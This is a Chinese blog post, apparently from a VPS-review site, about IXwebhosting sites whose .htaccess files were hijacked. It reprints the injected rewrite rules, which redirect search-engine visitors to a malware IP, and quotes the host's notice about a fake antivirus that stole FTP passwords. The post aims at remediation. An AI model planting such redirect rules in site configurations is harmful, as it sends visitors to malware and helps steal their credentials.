关于IXwebhosting上出现的安全问题
![]() | ![]() | ![]() | ![]() |
| 【性价之王】 | 【线路之王】 | 【价格之王】 | 【配置之王】 |
| 【免费之王】 | 【香港首推】 | 【梯子之王】 | 【独服之王】 |
症状:直接进入网站没有问题,从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。
具体例子请看: http://bbs.idcspy.com/thread-36706-1-1.html
原因: 网站的.htaccess文件被修改,会加入如下代码:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
上面的代码就是判断访问者来源,如果是来自上面那些搜索引擎,就自动转向
解决方法: 修正.htaccess,并且去掉.htaccess的写入权限。同时修正根目录的权限,去掉写入权限。
来自IXwebhosting官方的信息,此安全隐患已经得到修正,他们也杀掉了服务器上大部分此类病毒,如果还有问题,请联系ixwebhosting检查。被感染的原因可能是由于你的ftp密码被盗,进而被修改网站文件。
下面是ixwebhosting关于此问题发给用户的信件:
In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.
We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.
While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:
1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/ … tall-antivirus-2009
2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.
To illustrate the severity of the issue I would like to share some facts with you:
* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system
We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.
If you have questions regarding any of this information, please contact our support team anytime.
Kind Regards,
Fatima Said, CCO
IX Web Hosting
猜你可能想看的VPS
- 企鹅小屋→香港 CMI CN2 KVM VPS 256MB 内存 200香港VPS[主机]
- RAKsmart 开年大促→圣何塞服务器 61.38 美元起 日本服务器日本VPS[主机]
- 黑五 CloudCone→年付 15 美元的机器又补货了 四个套餐 都全球[VPS测评]
- PHP→Cannot use object of type stdCla全球[VPS测评]
- TMThosting→达拉斯大硬盘 KVM 九折 西雅图 KVM 七五折全球[VPS测评]
- nat.bz→1500 元 月 2 核 4GB 内存 20GB 空间 不虚拟空间(主机)
- 2019 年搬瓦工最新网址全球[VPS测评]
- GixHosting→英国虚拟主机 不限 SSD 空间 不限限流量 年付虚拟空间(主机)
- 疯狂猜成语 图猜成语一个黑色人站在三个房子旁边还有一个红色箭头是什么成语全球[VPS测评]
- anyNode黑五便宜VPS1G内存20g硬盘1g端口2T大流量年付仅8全球[VPS测评]
- RAKsmart 服务器限量秒杀,40G防御仅99刀,洛杉矶新品预售,美全球[VPS测评]
- JustVPS 新加披云服务器促销,首年优惠,年付$37.35起全球[VPS测评]
- WordPress 5.2让你更容易去修复网站问题全球[VPS测评]
- 易科云新上香港CN2套餐1G内存20g硬盘5m小带宽月付仅22.4元香港VPS[主机]
- Dewabiz-印度尼西亚 5.3$ 月 1核1G内存25G硬盘 不限流全球[VPS测评]
- Edgevirt-测评 美国迈阿密VPS 5T流量@10Gbps端口 原美国VPS[主机]
- ZeptoVM 512M内存 10G SSD 320G流量 1G带宽 伯全球[VPS测评]
- 2023年 IDC市场结构和方向的深度分析全球[VPS测评]
- 海量科技:香港2核2G云服务器,5M独享带宽,低至168元/月香港VPS[主机]
- 2022年最新的15个美容院抖音文案,美容院文案怎么写全球[VPS测评]
- 因搜包耽误员工下班,苹果将支付3050万美元赔款全球[VPS测评]
- HostKvm:1核/4G/30G硬盘/750G/20Mbps/香港kv香港VPS[主机]
- 金斗云怎么样?香港CN2月付23元,圣何塞CN2月付22元香港VPS[主机]
- HostXen:双十一新用户香港、日本vps,送20元代金券,充值300日本VPS[主机]
- 74块钱一年的云服务器可以用来做什么?全球[VPS测评]
- 56云服务器怎么样?56云免备案香港云服务器价格多少钱?香港VPS[主机]
- 免备案服务器对权重和网站排名有影响吗?全球[VPS测评]
- 阿里云香港服务器多少钱一年?香港云服务器租用年付价格表香港VPS[主机]
- UOVZ怎么样?香港30M大带宽VPS 直连线路月付50元香港VPS[主机]
- ExCloud:1核256M存/8GB SSD空间/100GB流量/OV虚拟空间(主机)
转载请注明原文地址:http://140.238.13.167:12355/read-89550.html











